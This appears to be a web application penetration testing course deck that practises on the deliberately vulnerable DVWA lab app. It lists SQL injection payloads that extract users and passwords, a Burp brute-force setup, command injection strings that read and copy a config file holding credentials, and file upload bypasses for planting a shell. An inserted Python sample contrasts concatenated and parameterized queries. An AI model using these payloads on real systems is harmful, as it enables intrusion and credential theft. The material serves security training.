WEB APPLICATION TESTING


1 WEB APPLICATION TESTING
Web Application Penetration Testing ‘17

2 Web Application Testing
Let's play with the security of web applications and learn how bugs are found. Throughout, we'll work on DVWA and related tools.

3 Installing XAMPP
XAMPP is used to set up a local web stack (Apache, MySQL, etc.). Download & install XAMPP - then start the Apache and MySQL services.

4 DVWA
DVWA – Damn Vulnerable Web Application.
An intentionally vulnerable web application used for skills development. It contains the common vulnerabilities usually found in web applications. Download -

5 Installing DVWA
Open the directory where DVWA was downloaded and unzip it. Move the DVWA directory into the Apache server directory. Open a web browser and go to localhost/<path of dvwa under apache>, e.g. localhost/DVWA.

6 Setting up DVWA Database
Initially DVWA will show a database error and ask for a change in the “config.inc.php” file. Open the file in any editor, change the default password and leave everything else as it is. Open the web browser again, go to localhost/DVWA and click “Create/Update Database”. You will be redirected to the login window; log in with the DVWA username admin and password password.

7 Setting Up DVWA
Log in to DVWA and select “DVWA Security”. Set the security level to “LOW” (for initial testing; we will raise the level later). Several attack categories are present, including SQL Injection, XSS, CSRF, Brute Force, File Upload, File Inclusion, Insecure CAPTCHA, etc. Let's start testing ;)

8 DVWA – SQL Injection {Low Level}
SQL Injection is a top-rated vulnerability which can lead to full compromise of the SQL database behind the application. See the OWASP SQL Injection Cheat Sheet. Click on SQL Injection. It shows a USER ID field; apply the basic injections –
1' or '1' = '1
1' or 1 = 1#
1' or 1 = 1 UNION SELECT NULL, NULL#
TABLE_NAME FROM INFORMATION_SCHEMA.TABLES#
USER, PASSWORD FROM USERS#

9 SQL Injection {Medium Level}
Set DVWA Security to Medium and open SQL Injection. Open the Burp Suite proxy and set Intercept to ON. Test several queries, forwarding the request each time. Queries –
1' or 1 = 1#
1' or 1 = 1 UNION SELECT NULL, NULL#
TABLE_NAME FROM INFORMATION_SCHEMA.TABLES#
USER, PASSWORD FROM USERS#

10 SQL Injection {High}
Set DVWA Security to High and open SQL Injection. Check the source code to see the added security features. Apply the queries –
1' or 1 = 1#
1' OR 1=1 UNION SELECT NULL, table_name from information_schema.tables#
1' OR 1=1 UNION SELECT NULL, table_name from information_schema.columns=users#
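The reason the first Low-level payload returns every user is that the User ID is concatenated into the SQL string; the added example below (not DVWA's code, written in Python against an in-memory SQLite table standing in for DVWA's users table) puts that concatenation beside the bound-parameter form that the "added security features" you inspect at the higher levels are meant to approximate.

```python
import sqlite3

# Constructed sample rows standing in for DVWA's "users" table (not DVWA's schema).
SAMPLE_USERS = [
    (1, "admin", "admin"),
    (2, "gordonb", "Gordon"),
    (3, "1337", "Hack"),
]


def make_db():
    """In-memory SQLite database seeded with the constructed users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, user TEXT, first_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_lookup(conn, user_id):
    """Low-level pattern: the User ID is pasted straight into the SQL text.
    Hypothetical illustration of the bug class, not DVWA's own code."""
    query = f"SELECT user, first_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(query).fetchall()


def safe_lookup(conn, user_id):
    """Hardened form: the value is sent as a bound parameter, so it can only
    ever be compared as data and never changes the statement's structure."""
    query = "SELECT user, first_name FROM users WHERE user_id = ?"
    return conn.execute(query, (user_id,)).fetchall()


def demo():
    """Run both lookups with a normal ID and with the slide's first payload."""
    conn = make_db()
    payload = "1' or '1' = '1"  # the first payload from the Low-level slide
    return {
        "vulnerable_normal": vulnerable_lookup(conn, "1"),   # one row
        "vulnerable_payload": vulnerable_lookup(conn, payload),  # every row
        "safe_normal": safe_lookup(conn, "1"),               # one row
        "safe_payload": safe_lookup(conn, payload),          # no rows
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

SQLite uses `--` rather than MySQL's `#` for comments, so only the quote-balanced payload is used here; the structural point is the same for both engines.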

11 Brute Force {Low Level}
Open Burp Suite >> Proxy >> Options >> set the proxy listener to “ :8080”. Proxy >> Intercept >> Intercept On.
Open Firefox >> Options >> Advanced >> Network >> Connection >> Settings >> Manual proxy configuration >> :8080.
Open DVWA {LOW} >> Brute Force >> submit a fake username and password.
Setting up the attack – send the request to Intruder. Set Attack Type >> Cluster Bomb and add the positions to brute-force. Set the payloads – admin, administrator, username, password. Add a grep match for “welcome”. Start the attack. The request whose response length changes reveals the username and password.

12 Command Injection {Low}
Command-line introduction – dir lists the contents of a directory; cd changes the directory; type displays the contents of a file. Open DVWA {LOW} >> Command Injection. Enter an IP (localhost) and view the source to understand the functionality. Two commands can be joined using “&, &&, |, ||” etc. Joined commands –
<ip> & dir
<ip> & dir ..\..\
<ip> & type ..\..\config\config.inc.php
<ip> & copy ..\..\config\config.inc.php <new file name>

13 Command Injection {Medium}
Open DVWA {Medium} >> Command Injection. Use the | operator. The rest of the procedure is the same.

14 Command Injection {High}
Open DVWA {High} >> Command Injection. Use the | operator without a space. The rest of the procedure is the same.

15 File Inclusion
File inclusion allows an attacker to include a file. Open DVWA {LOW} >> File Inclusion. Try to access –
robots.txt – localhost/dvwa/robots.txt
phpinfo.php {root of site} – localhost/dvwa/phpinfo.php
bootmgr {root of drive}

16 File Upload {Low}
File extension validation is not set or can be bypassed, which allows uploading an infected file that can in turn infect the server and lead to total compromise. Open DVWA {Low} >> File Upload. Try uploading files with different extensions. Access the uploaded file to >>

17 File Upload {Medium}
Open DVWA {Medium} >> File Upload. Turn on Intercept in Burp Suite and try uploading the shell. Change the Content-Type in Burp Suite to “image/png” and forward the request. Access the uploaded file to >>

18 THANKS